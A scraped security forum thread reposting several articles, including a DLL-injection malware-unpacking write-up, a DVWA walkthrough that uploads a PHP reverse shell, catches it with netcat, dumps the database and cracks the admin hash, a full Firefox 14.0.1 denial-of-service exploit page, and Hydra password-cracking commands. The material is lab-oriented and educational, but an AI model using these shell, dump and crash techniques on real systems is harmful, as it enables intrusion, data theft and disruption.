iOS 6 Javascript Bug Raises Potential Security And Privacy Questions By Istvan Fekete last updated December 23, 2012 iOS 6 Safari has a potentially serious Javascript bug, which could have some serious security and privacy implications. According to a report from AppleInsider, users who toggle off Javascript in the iOS 6 Safari web browser are not totally in the clear. The appearance of a Smart App Banner designed to give developers the ability to promote App Store software within Safari on a certain website, automatically toggles your Javascript back on without notifying the user. You can check out this bug by opening up the Setting app and choosing Safari, then turning off Javascript. Then you can visit this test page using your iPhone's browser. As you will see, it will turn on Javascript, without notifying you. Peter Eckersley, technology products director with digital rights advocacy group, the Electronic Frontier Foundation, said he would characterize such an issue as a "serious privacy and security vulnerability." Neither Eckersley nor the EFF had heard of the bug in iOS 6, nor had they independently tested to confirm that they were able to replicate the issue. But Eckersley said that if the problem is in fact real, it's something that Apple should work to address as quickly as possible. "It is a security issue, it is a privacy issue, and it is a trust issue," Eckersley said. "Can you trust the UI to do what you told it to do? It's certainly a bug that needs to be fixed urgently." According to the report, this issue has existed ever since iOS 6 went public, and the recent updates iOS 6.0.1 and iOS 6.0.2 didn't patch it. Furthermore, the bug isn't iPhone specific, it applies to all iDevices running iOS 6 and even iOS 6.1 beta seems to carry this bug as well. Sursa: iOS 6 Javascript Bug Raises Potential Security And Privacy QuestionsJaxov
-
The End of x86? An Update by mjfern on December 21, 2012 In October 2010, I predicted the disruption of the x86 architecture, along with its major proponents Intel and AMD. The purpose of this current article is to reassess this prediction in light of recent events. Below, I present the classic signs of disruption (drawing on Christensen’s framework), my original arguments in blockquotes, and then an update. 1. The current technology is overshooting the needs of the mass market. Due to a development trajectory that has followed in lockstep with Moore’s Law, and the emergence of cloud computing, the latest generation of x86 processors now exceed the performance needs of the majority of customers. Because many customers are content with older generation microprocessors, they are holding on to their computers for longer periods of time, or if purchasing new computers, are seeking out machines that contain lower performing and less expensive microprocessors. x86 shipments dropped by 9% in Q3 2012. Furthermore, the expected surge in PC sales (and x86 shipments) in Q4 due to the release of Windows 8 has failed to materialize. NPD data indicates that Windows PCs sales in U.S. retail stores fell a staggering 21% in the four-week period from October 21 to November 17, compared to the same period the previous year. [1] In short, there is now falling demand for x86 processors. Computer buyers are shifting their spending from PCs to next generation computing devices, including smartphones and tablets. 2. A new technology emerges that excels on different dimensions of performance. While the x86 architecture excels on processing power – the number of instructions handled within a given period of time – the ARM architecture excels at energy efficiency. According to Data Respons (datarespons.com, 2010), an “ARM-based system typically uses as little as 2 watts, whereas a fully optimized Intel Atom solution uses 5 or 6 watts.” The ARM architecture also has an advantage in form factor, enabling OEMs to design and produce smaller devices. While Intel has closed the ARM energy efficiency gap with its latest x86 Atom processers, the latest generation ARM-based chips are outperforming their Atom counterparts. And the performance advantage of ARM-based processors is expected through 2013. The ARM architecture also continues to maintain a significant advantage in the area of customization, form factor, and price due to ARM Holding’s unique licensing-based business model. Because of these additional benefits of ARM technology, it’s unlikely that Intel’s energy efficiency gains will significantly affect its short-term market penetration. 3. Because this new technology excels on a different dimension of performance, it initially attracts a new market segment. While x86 is the mainstay technology in PCs, the ARM processor has gained significant market share in the embedded systems and mobile devices markets. ARM-based processors are used in more than 95% of mobile phones (InformationWeek, 2010). And the ARM architecture is now the main choice for deployments of Google’s Android and is the basis of Apple’s A4 system on a chip, which is used in the latest generation iPod Touch and Apple TV, as well as the iPhone 4 and iPad. ARM-based processors continue to dominate smartphones and tablets, with the ARM architecture maintaining a market share of 95% and 98%, respectively. [2] In the first half of 2012, there were just six phones with x86 chips inside (i.e., 0.2% of the worldwide market). 
And, as of December 2012, there was scarce availability of tablets with x86 processors. [3] A major concern going forward is that Intel is limiting tablet support to Windows 8. 4. Once the new technology gains a foothold in a new market segment, further technology improvements enable it to move up-market, displacing the incumbent technology. With its foothold in the embedded systems and mobile markets, ARM technology continues to improve. The latest generation ARM chip (the Cortex-A15) retains the energy efficiency of its predecessors, but has a clock speed of up to 2.5 GHz, making it competitive with Intel’s chips from the standpoint of processing power. As evidence of ARM’s move up-market, the startup Smooth-Stone recently raised $48m in venture funding to produce energy efficient, high performance chips based on ARM to be used in servers and data centers. I suspect we will begin seeing the ARM architecture in next generation latops, netbooks, and smartphones (e.g., A4 in a MacBook Air). ARM’s latest Cortex-A15 processor is highly competitive with Intel’s Atom line of processors. In a benchmarking analysis, “the [ARM-based] Samsung Exynos 5 Dual…easily beat out all of the tested Intel Atom processors.” And while Intel’s Core i3 processors outperformed the ARM-based processors, the iCore’s performance-per-watt makes it unsuitable for smartphones and tablets. Since energy conservation and cost is a growing concern among manufacturers, IT departments, and consumers, ARM-based chips are also moving upmarket into more demanding devices. While ARM technology hasn’t made much headway in traditional desktop PCs and laptops, it’s been deployed in the latest generation Google Chromebook, produced by Samsung. It’s also the processor of choice in Microsoft’s Surface RT, which is arguably a hybrid device (PC and tablet) given it runs Windows and Office and has a keyboard. Furthermore, ARM’s penetration of the server market is ushering in a new “microserver” era, with support from AMD, Calxeda, Dell, HP, Marvell, Samsung, Texas Instruments, and others (e.g., Applied Micro). [4] 5. The new, disruptive technology looks financially unattractive to established companies, in part because they have a higher cost structure. In 2009, Intel’s costs of sales and operating expenses were a combined $29.6 billion. In contrast, ARM Holdings, the company that develops and supports the ARM architecture, had total expenses (cost of sales and operating) of $259 million. Unlike Intel, ARM does not produce and manufacture chips; instead it licenses its technology to OEMs and other parties and the chips are often manufactured using a contract foundry (e.g., TSMC). Given ARM’s low cost structure, and the competition in the foundry market, “ARM offers a considerably cheaper total solution than the x86 architecture can at present…” (datarespons.com, 2010). Intel is loathe to follow ARM’s licensing model because it would reduce Intel’s revenues and profitability substantially. In the first three quarters of 2012, Intel had revenue of $38.864 billion, operating expenses of $28.509b, and operating income of $11.355b. In contrast, ARM Holdings, with its licensing-based business model, had revenue of $886.88 million, operating expenses of $576.5m, and operating income of $307.12m. ARM Holdings has revenues and profits that are just a fraction (2-3%) of Intel’s. This is the case even though ARM-based processors have a much greater share of the overall processor market. 
[5] The smartphone and tablet markets, despite their sheer size and growth rates, are financially unattractive in comparison to the PC market. The price point and margins on processors in the mobile markets are significantly lower than that of higher-end PC and server processors. For instance, as of November 2012, the “Atom processor division contribute[d] only around 2% to Intel’s valuation.” In short, the ARM architecture appears to be in the early stages of disrupting x86, not just in the mobile and embedded systems markets, but also in the personal computer and server markets, the strongholds of Intel and AMD. This is evidenced in part by investors’ expectations for ARM’s, Intel’s and AMD’s future performance in microprocessor markets: today ARM Holdings has a price to earnings ratio of 77.93, while Intel and AMD have price to earnings ratios of 10.63 and 4.26, respectively. It doesn’t appear Intel (or AMD) have solved the disruptive threat posed by ARM. The ARM architecture is maintaining its market share in smartphones and tablets, and gaining ground in upmarket devices, from hybrids (Chromebook and Surface RT) to servers. Investors concur with this assessment, as ARM Holdings has a price to earnings ratio of 70.74, while Intel has a price to earnings ratio of 9.22. [6] For Intel and AMD to avoid being disrupted, they must offer customers a microprocessor with comparable (or better) processing power and energy efficiency relative to the latest generation ARM chips, and offer this product to customers at the same (or lower) price point relative to the ARM license plus the costs of manufacturing using a contract foundry. The Intel Atom is a strong move in this direction, but the Atom is facing resistance in the mobile market and emerging thin device markets (e.g., tablets) due to concerns about its energy efficiency, form factor, and price point. While Intel has closed the energy efficiency gap with its latest Atom processors, it still lags in performance and hasn’t dealt with the issues of customization and form factor. It’s likely that its pricing also remains unattractive. Although I don’t have precise data on Intel or ARM’s pricing for comparable processors, one can get an estimate by comparing Intel’s listed processor prices with teardown data from iSuppli. According to this rough analysis, the latest Atom processors range in price from $42-$75, while ARM-based processors have prices (including manufacturing) in the $15-25 range. [7] Therefore, Intel would need to offer a 60%+ discount off list prices to just achieve parity. The x86 architecture is supported by a massive ecosystem of suppliers (e.g., Applied Materials), customers (e.g., Dell), and complements (e.g., Microsoft Windows). If Intel and AMD are not able to fend off ARM, and the ARM architecture does displace x86, it would cause turbulence for a large number of companies. This turbulence is now real and visible. The major companies that makeup the x86 ecosystem, including producers (Intel and AMD), suppliers (e.g., Applied Materials), customers (e.g., Dell and HP), and complements (e.g., Microsoft), are all struggling to gain the confidence of investors. Each has underperformed stock market averages over the last two years and many are now implementing their own ARM-based strategies, remarkably even x86 stalwarts AMD and Microsoft. Meanwhile, Paul Otellini, Intel’s CEO, retired suddenly and unexpectedly, just last month.Intel, in particular, faces a precarious situation. 
It can harvest its tremendous profits in the PC market for the next several years or it can compete in the next generation of processors by aggressively developing low-margin processors and replicating ARM Holding’s licensing-based business model. [7] It’s a choice between serving a known, highly profitable market (in the shorter-term) and possibly winning in a comparatively unknown, unprofitable market (in the longer-term). As a professional executive or manager, which option would you choose? Thus we have the innovator’s dilemma.Join the discussion on Hacker News.If you’ve read this far, you should follow me on Twitter.— [1] This contrasts significantly with the sales impact from the launch of Windows 7, when sales of Windows PCs rose 49% during the first week Windows 7 was on sale, compared to the previous year. [2] While Apple has an instruction set license to execute ARM commands, it designed its own custom ARM compatible CPU core for the iPhone 5 and iPad 4. [3] Intel reports having 20 tablets in its pipeline for launch by the end of this year. [4] Intel’s efforts to create a new market segment for its x86 microprocessors, such as Ultrabooks, has thus far underperformed expectations. [5] I wasn’t able to find data on Intel processor shipments in 2011, but as a rough comparison, it looks like ARM and its licensees shipped 7.9b processors in 2011, while worldwide PC shipments totalled 352.8m units. In 2011, Intel had a roughly 80% market share in the PC market. [6] AMD had net loss in its latest quarter and thus you cannot compute a price to earnings ratio. [7] Intel could obtain an ARM license and enter the contract foundry business, but analysts expect such a move would also have a significant drag on its margins and profitability. Sursa: The End of x86? An Update
-
[Audio] Issues with security and networked object system From the Hacker Jeopardy winning team. He will discuss Issues with Security and Networked Object Systems, looking at some of the recent security issues found with activeX and detail some of the potentials and problems with network objects. Topics will include development of objects, distributed objects, standards, ActiveX, corba, and hacking objects. Size 23.3 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Clovis%20-%20Issues%20with%20Security%20and%20Networked%20Object%20Systems%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
-
[Audio] Packet Sniffing He will define the idea, explain everything from 802.2 frames down to the TCP datagram, and explain the mechanisms (NIT, bpf) that different platforms provide to allow the hack. Size: 25.2 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Wrangler%20-%20Packet%20Sniffing%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
-
[h=1]Security researchers identify malware infecting U.S. banks[/h] By Lucian Constantin, IDG News Service Dec 22, 2012 12:36 PM Security researchers from Symantec have identified an information-stealing Trojan program that was used to infect computer servers belonging to various U.S. financial institutions. Dubbed Stabuniq, the Trojan program was found on mail servers, firewalls, proxy servers, and gateways belonging to U.S. financial institutions, including banking firms and credit unions, Symantec software engineer Fred Gutierrez said Friday in a blog post. "Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users," Gutierrez said. "Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions." (Also see "How to Avoid Malware.") Based on a map showing the threat's distribution in the U.S. that was published by Symantec, the vast majority of systems infected with Stabuniq are located in the eastern half of the country, with strong concentrations in the New York and Chicago areas. Compared to other Trojan programs, Stabuniq infected a relatively small number of computers, which seems to suggest that its authors might have targeted specific individuals and organizations, Gutierrez said. The malware was distributed using a combination of spam emails and malicious websites that hosted Web exploit toolkits. Such toolkits are commonly used to silently install malware on Web users' computers by exploiting vulnerabilities in outdated browser plug-ins like Flash Player, Adobe Reader, or Java. Once installed, the Stabuniq Trojan program collects information about the compromised computer, like its name, running processes, OS and service pack version, assigned IP (Internet Protocol) address and sends this information to command-and-control (C&C) servers operated by the attackers. "At this stage we believe the malware authors may simply be gathering information," Gutierrez said. Sursa: Security researchers identify malware infecting U.S. banks | PCWorld
-
[h=1]The Social Impact of Malware Infections[/h]

I had a good experience today with the "social impact" of malware infections and I would like to share it with you. For most infosec people, it is part of the game to play the fireman for family and friends when they are in trouble with their computer. The term "computer" is used by them as a generic term and includes the hardware, the software, the Internet connectivity, mailboxes, etc. Today it was again my turn to be contacted by a friend who received a "strange message" on his screen. That's also typical: people always see a "strange message" and don't even try to read and understand it! My wife picked up the call and said that my friend sounded very affected and had asked me to call back asap. I quickly brought with me an emergency toolkit (a BackTrack on USB, some cables, USB sticks, a Windows DVD) and went to the front!

Once arrived, my friend was very happy to see me and explained that while he was surfing on "some websites", a message suddenly popped up. For me, it did not look like a regular malware infection: they usually try to install themselves and operate silently. My attention was caught by some words while he was describing the problem: "Police", "They ask money", "pornographic website". Ok, it's ransomware! I booted the laptop offline to reproduce the malicious behaviour and saw this nice screen:

[Screenshot: the ransomware warning]

My friend and his wife were really very affected by this message and did not know how to react. They saw this as an intrusion into their private life. Worse, the displayed message referred to visits to child pornography websites! Of course, I was tempted to find the infection vector, which was certainly a compromised (or malicious) website. But my goal was also to respect my friend's privacy. I decided to simply get rid of the malware. Quite easy with this one: it's a common one that just displays a pop-up window. There is no file encryption. I just booted in emergency mode and reverted to the latest valid restore point. Case closed!

Then I took some time to discuss with them, and I realized how much this story had affected my friend (and his wife!). The infection happened Saturday evening. He did not sleep, he did not eat at all! He had 24 hours to pay 100 EUR, and he spent the night with the following questions in mind:

- To pay or not to pay?
- Do I talk about this problem with my wife?
- But I never visited child pornography websites, how did they find this?
- Will the police catch me? Come to my house, seize my computer?
- How do I report that I'm not a criminal?

Fortunately, he had the right reaction and called me "because I'm working with computers" (as mentioned in the introduction). But not all people know IT people and can benefit from free support. How will those people address the same kind of issue? His wife also had lots of questions:

- Does my husband really visit child pornography websites?
- Can I trust him again?
- Will the police catch him?

Those friends have been a couple for years and have a very stable life. Can you imagine the same story in a couple that already has social or financial problems? Or that wants to divorce? This could completely change the rules of the game. This story really proves that the bad guys are playing with human behaviour to catch victims! It's a pity that I did not find the website which delivered the malware, so I could not do a deeper analysis, but once again, it's my friend's privacy! Let's put the social aspect aside now: why was he infected?
Alas, I should say, nothing new, just the usual mistakes:

- Using the computer with administrator rights
- Outdated AV
- No backup

It's amazing (in the right sense of the term) to see how such malware uses human weaknesses and feelings (stress, shame, ignorance, ...) to successfully achieve its goal! Anyway, the case is closed for my friend. I'll just need to continue the awareness training from time to time!

Sursa: The Social Impact of Malware Infections | /dev/random
-
[h=3]Using DLL Injection to Automatically Unpack Malware[/h]

In this post, I will present DLL injection by means of an example: automatically unpacking malware. But first, the most important question:

[h=2]What is DLL Injection and Reasons for Injecting a DLL[/h]

DLL injection is one way of executing code in the context of another process. There are other techniques to execute code in another process, but essentially this is the easiest way to do it. As a DLL brings nifty features like automatic relocation of code and good testability, you don't have to reinvent the wheel and do everything on your own. But why would you want to inject a DLL into a foreign process? There are lots of reasons. As you are within the process address space, you have full control over the process. You can read and write arbitrary memory locations, set hooks, etc. with unsurpassed performance. You could basically do the same with a debugger, but it is way more convenient to do it in an injected DLL. Some showcases are:

- creation of cheats, trainers
- extracting passwords and encryption keys
- unpacking packed/encrypted executables

To me, especially the opportunity of unpacking and decrypting malware is very interesting. Basically, most malware samples are packed by the same packer or family of packers. In the following, I will shortly summarize how it works.

[h=2]The Malware Packer[/h]

In order to evade anti-virus detection, the authors of the packer have devised an interesting unpacking procedure. Roughly, it can be summarized in the following stages: First, the unpacker stub does some inconspicuous-looking stuff in order to thwart AV detection. The code is slightly obfuscated, but not so strongly as to raise suspicion. Actually, the code that is being executed decrypts parts of the executable and jumps to it by self-modifying code. In the snippet below, you see how exactly the code is modified. The first instruction of the function that is supposedly called is changed to a jump to the newly decrypted code.

mov     [ebp+var_1], 0F6h
mov     al, [ebp+var_1]
mov     ecx, ptr_to_function
xor     al, 0A1h
sub     al, 6Eh
mov     [ecx], al            ; =0xE9
mov     ecx, ptr_to_function
...
mov     [ecx+1], eax         ; delta to decrypted code
...
call    eax

As you can see (after doing some math), an unconditional near jmp is inserted right at the beginning of the function to be called. Hence, by calling a supposedly normal function, the decrypted code is executed. The decrypted stub allocates some memory and copies the whole executable to that memory. Then it does some relocation (as the base address has changed) and executes the entry point of the executable. In the following code excerpt, you can see the generic calculation of the entry point:

mov     edx, [ebp+newImageBase]
mov     ecx, [edx+3Ch]       ; e_lfanew
add     ecx, edx             ; get PE header
...
mov     ebx, [ecx+28h]       ; get AddressOfEntryPoint
add     ebx, edx             ; add imageBase
...
mov     [ebp+vaOfEntryPoint], ebx
...
mov     ebx, [ebp+vaOfEntryPoint]
...
call    ebx

Here, the next stage begins. At first glance it seems the same code is executed twice, but naturally, there's a deviation in control flow. For example, the packer authors had to make sure that the encrypted code doesn't get decrypted twice. For that, they declared a global variable which in this sample initially holds the value 0x6E6C82B7. So upon first execution, the variable alreadyDecrypted is set to zero.

mov     eax, alreadyDecrypted
cmp     eax, 6E6C82B7h
jnz     dontInitialize
...
mov     alreadyDecrypted, 0
dontInitialize:
...
In the decryption function, that variable is checked for zero, as you can see/calculate in the following snippet:

mov     [ebp+const_0DF2EF03], 0DF2EF03h
mov     edi, 75683572h
mov     esi, 789ADA71h
mov     eax, [ebp+const_0DF2EF03]
mov     ecx, alreadyDecrypted
xor     eax, edi
sub     eax, esi
cmp     eax, ecx             ; eax = 0
jnz     dontDecrypt

Once more, you see the obfuscation employed by the packer. Then, a lengthy function is executed that takes care of the actual unpacking process. It comprises the following steps:

- gather chunks of the packed program from the executable memory space
- BASE64-decode it
- decompress it
- write it section by section to the original executable's memory space, effectively overwriting all of the original code
- fix imports etc.

After that, the OEP (original entry point) is called. The image below depicts a typical OEP of an unspecified malware. Note that after a call to some initialization function, the first API function it calls is SetErrorMode.

[Figure: Code at the OEP]

[h=3]Weaknesses[/h]

What are possible points to attack the unpacking process? Basically, you can grab the unpacked binary at two points: first, when it is completely unpacked on the heap but not yet written to the original executable's image space, and second, once the malware has reached its OEP. The second option is the most common and generic one when unpacking binaries, so I will explain that one. Naturally, you can write a static unpacker, and perhaps one of my future posts will deal with that.

One of the largest weaknesses is the handling of memory allocations and the setting of the appropriate access rights. As a matter of fact, in order to write to the original executable's memory, the unpacker grants RWE access to the whole image space. Hence, it has no problems accessing and executing all data and code contained in it. If you set a breakpoint on VirtualProtect, you will see what I mean. There are very distinct calls to this function, and the one setting the appropriate rights to the whole image space really sticks out. After a little research, I found two articles dealing with the unpacking process of the packer (here and here), but neither seems aware that the technique presented in the following is really easily implemented. Once you have reached the VirtualProtect call that changes the access rights to RWE, you can change the flags to RW-only, hence execution of the unpacked binary will not be possible. So, once the unpacker tries to jump to the OEP, an exception will be raised due to missing execution rights.

So, now that we know the correct location where to break the packer, how do we unpack malware automatically? Here DLL injection enters the scene. The basic idea is very simple (a minimal injector sketch follows below):

- start the binary in suspended state
- inject a DLL
- this DLL sets a hook on VirtualProtect, changing RWE to RW at the correct place
- as backup, a hook on SetErrorMode is set. Hence, when encountering unknown packers, the binary won't be executed for too long.
- resume the process

Some other things have to be taken care of, like correctly dumping the process and rebuilding imports, but these are out of the scope of this article. If you encounter them yourself and don't know how to handle them, just ask me ;-) It seems not too easy to find a decent DLL injector.
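Here is what the start-suspended-then-inject flow from the list above can look like with the classic CreateRemoteThread/LoadLibraryA technique. This is my own minimal illustration, not the author's injector: error handling is mostly omitted, the paths are placeholders, it assumes injector and target have the same bitness and that kernel32.dll is mapped at the same base in both processes, and injecting this early is exactly the fragile part (the target is not fully initialized yet), which is why a robust injector needs considerably more work.

/* Minimal sketch of "start suspended, inject DLL, resume".  Illustration
 * only; see the caveats in the paragraph above. */
#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    const char *target  = "C:\\samples\\packed.exe";    /* placeholder path */
    const char *dllPath = "C:\\tools\\unpack_hook.dll"; /* placeholder path */

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };

    /* 1. Start the binary in suspended state. */
    if (!CreateProcessA(target, NULL, NULL, NULL, FALSE,
                        CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
        printf("CreateProcess failed: %lu\n", GetLastError());
        return 1;
    }

    /* 2. Write the DLL path into the target and load the DLL there.
     *    LoadLibraryA's address is taken from our own kernel32, assuming it
     *    is mapped at the same base in the target. */
    SIZE_T len = strlen(dllPath) + 1;
    LPVOID remote = VirtualAllocEx(pi.hProcess, NULL, len,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    WriteProcessMemory(pi.hProcess, remote, dllPath, len, NULL);

    HANDLE hThread = CreateRemoteThread(pi.hProcess, NULL, 0,
            (LPTHREAD_START_ROUTINE)GetProcAddress(
                GetModuleHandleA("kernel32.dll"), "LoadLibraryA"),
            remote, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);   /* let the hook DLL set up */
    CloseHandle(hThread);

    /* 3. Resume the main thread; VirtualProtect is now guarded. */
    ResumeThread(pi.hThread);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}

The injected DLL would then install its VirtualProtect (and SetErrorMode) detours, for instance from DllMain or a thread started there, before the target's main thread is resumed.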
Especially one that injects a DLL before the program starts (if there is one around, please tell me). As I could not find an injector capable of injecting right at program start, I coded my own. You can find it at my GitHub page. It uses code from Jan Newger, so kudos to him. I'm particularly fond of using test-driven development employing the googletest framework ;-)
[h=3]Conclusion[/h]
The presented technique works very well against this unpacker. So far, I've encountered about 50 samples and almost all of them can be unpacked using this technique. Furthermore, all packers that overwrite the original executable's image space can be defeated with this technique. In future posts, I will evaluate this technique against other packers.
Posted by Sebastian Eschweiler at 03:20
Source: Malware Muncher: Using DLL Injection to Automatically Unpack Malware
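To make the workflow above more concrete, here is a minimal, untested C sketch of the "start suspended, inject, resume" step using the classic CreateRemoteThread plus LoadLibraryA approach. This is not the author's injector from GitHub; the file names, the 32-bit assumption and the missing error handling are simplifications, and injecting this early in process start-up can be fragile on some Windows versions, which is why a real injector does considerably more work.

#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    if (argc < 3) {
        printf("usage: %s <packed.exe> <full path to hook.dll>\n", argv[0]);
        return 1;
    }

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };

    /* 1. Start the packed sample suspended, so none of its code runs yet. */
    if (!CreateProcessA(argv[1], NULL, NULL, NULL, FALSE,
                        CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
        printf("CreateProcess failed: %lu\n", GetLastError());
        return 1;
    }

    /* 2. Copy the DLL path into the target's address space. */
    SIZE_T len = strlen(argv[2]) + 1;
    LPVOID remote = VirtualAllocEx(pi.hProcess, NULL, len,
                                   MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    WriteProcessMemory(pi.hProcess, remote, argv[2], len, NULL);

    /* 3. Run LoadLibraryA(remote path) inside the target. kernel32.dll is
          mapped at the same base address in every process of a session, so
          the locally resolved address is also valid in the target. */
    LPTHREAD_START_ROUTINE loadLibrary = (LPTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    HANDLE th = CreateRemoteThread(pi.hProcess, NULL, 0, loadLibrary,
                                   remote, 0, NULL);
    WaitForSingleObject(th, INFINITE);
    CloseHandle(th);

    /* 4. DllMain of the injected DLL has installed its VirtualProtect and
          SetErrorMode hooks by now; let the unpacker stub run into them. */
    ResumeThread(pi.hThread);

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}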
-
Disabling Antivirus Program(S)
Description:
PDF: https://hacktivity.com/en/downloads/archives/185/
The speaker holds a Bachelor's Degree in Computer Science from the Faculty of Software Engineering at the College of Nyiregyhaza. He has more than 9 years of experience in the field of IT security, mostly in designing and creating security-related products like DLP (data loss prevention) solutions and system log collectors. He was a developer of the widely known open source tool syslog-ng. He currently works as an IT security consultant and researcher at BDO MITM Kft.
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
Source: Disabling Antivirus Program(S)
-
File Upload Exploitation
File upload vulnerabilities constitute a major threat for web applications. A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell. Of course a shell is always a goal, but a good penetration tester must not stop there. Further activities can be performed after obtaining the shell, and the focus of these activities should be the database. In this article we will see how we can obtain a shell by exploiting a file upload on a Linux web server and how we can dump the database that is running on the system.
Backtrack includes a variety of web shells for different technologies like PHP, ASP etc. In our example we will use the Damn Vulnerable Web Application (DVWA), which is written in PHP, in order to attack the web server through the file upload. The web shell that we will use in our case is php-reverse-shell.
[Image: Uploading the web shell]
Now we have to set our machine to listen on the same port as our web shell. We can do this with netcat and the command nc -lvp 4444. The next step is to go back to the web application and try to access the URL where the PHP reverse shell exists. We will notice that it returns a shell to our console:
[Image: Obtaining a shell]
So we have compromised the remote web server and we can execute further commands from our shell, like a simple ls in order to discover directories.
[Image: Listing directories]
Now it is time to dump the database. We will have to go to the directory named uploads, because this directory has write permissions and is visible to the outside world, which means that we can access it and create a file there. Then we can use the following command in order to dump the database to a file:
mysqldump -u root -p dvwa > hacked_db.sql
We already know that the user root exists because it is already logged into the system. Also, it is very common for the name of the application or of the company to be the database name, so we will use dvwa. The > sign will create a file inside the uploads directory with the name hacked_db.sql.
[Image: Dumping the database to a file]
As we can see from the image above, we had to provide a password. In this scenario we just pressed enter without submitting anything. In a real-world penetration test it would be much more difficult; however, it is always good practice to try some of the common passwords. The next two images show the dump of the dvwa database.
[Image: Dump of DVWA database]
[Image: Dump of DVWA database 2]
From the last image we can see that we even obtain the password hash of the admin, which can be cracked by using a tool like John the Ripper (a sample command is given at the end of this post). This is also important, as we may want to have admin privileges inside the application as well.
Conclusion
In this article we saw how we can obtain a shell by exploiting a file upload form of an application and how we can dump the database. Of course, in a real-world scenario it is more likely that restrictions will be in place, but it is good to know the methodology and the technique that we must follow once we have managed to upload our web shell.
Source: File Upload Exploitation
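Regarding the cracking step mentioned above: DVWA stores plain MD5 hashes, so a John the Ripper run along the following lines should work. The wordlist path is only an example from a Backtrack install and may differ on your system, and raw-md5 support requires the jumbo build of john; the hash value itself is a placeholder for whatever you pulled out of the dump.

echo "admin:<md5 hash from the dump>" > dvwa_hash.txt
john --format=raw-md5 --wordlist=/pentest/passwords/wordlists/darkc0de.lst dvwa_hash.txt
john --show --format=raw-md5 dvwa_hash.txt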
-
[h=2]Mozilla Firefox 14.0.1 Denial of Service Vulnerability[/h]
Author: knowlegend

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FF-14.0.1 DoS-Exploit by Know v3.0</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" />
<script type="text/javascript" language="JavaScript">
var CrashIt = false;
if (typeof CrashIt != 'undefined') {
    CrashIt = new XMLHttpRequest();
}
if (!CrashIt) {
    try {
        CrashIt = new ActiveXObject("Msxml2.XMLHTTP");
    } catch(e) {
        try {
            CrashIt = new ActiveXObject("Microsoft.XMLHTTP");
        } catch(e) {
            CrashIt = null;
        }
    }
}
function load() {
    CrashIt.open('get','bla.php');
    CrashIt.onreadystatechange = handleContent;
    CrashIt.send(null);
    return false;
}
function handleContent() {
    while(CrashIt.readyState != 4) {
        document.getElementById('inhalt').innerHTML = "pwnd";
    }
    document.getElementById('inhalt').innerHTML = CrashIt.responseText;
}
</script>
</head>
<body onload="load();">
<div id="inhalt"></div>
</body>
</html>

# 1337day.com [2012-12-23]
Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
-
[h=3]Fast Network cracker Hydra v 7.4[/h]
One of the biggest security holes is passwords, as every password security study shows. THC-Hydra, a very fast network logon cracker that supports many different services, has now been updated to version 7.4.
Hydra is available for Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OS X. It currently supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Change Log
New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
Added support for win8 and win2012 server to the RDP module
Better target distribution if -M is used
Added colored output (needs libcurses)
Better library detection for current Cygwin and OS X
Fixed the -W option
Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
Fixed HTTP Form module false positive when no answer was received from the server
Fixed SMB module return code for invalid hours logon and LM auth disabled
Fixed http-{get|post-form} from xhydra
Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
Added debug mode option to usage (thanks to Anold Black)
Download THC-Hydra 7.4
Source: Fast Network cracker Hydra v 7.4 updated version download - Hacker News, Security updates
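For readers new to the tool, a typical invocation looks roughly like the commands below. The hosts, user names and wordlist paths are placeholders, and you should run hydra without arguments to see the exact options and service names supported by your build.

hydra -l admin -P /path/to/wordlist.txt -t 4 -V ssh://192.168.1.10
hydra -L users.txt -P passwords.txt ftp://192.168.1.10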
-
Arachni Web Application Security Scanner Framework
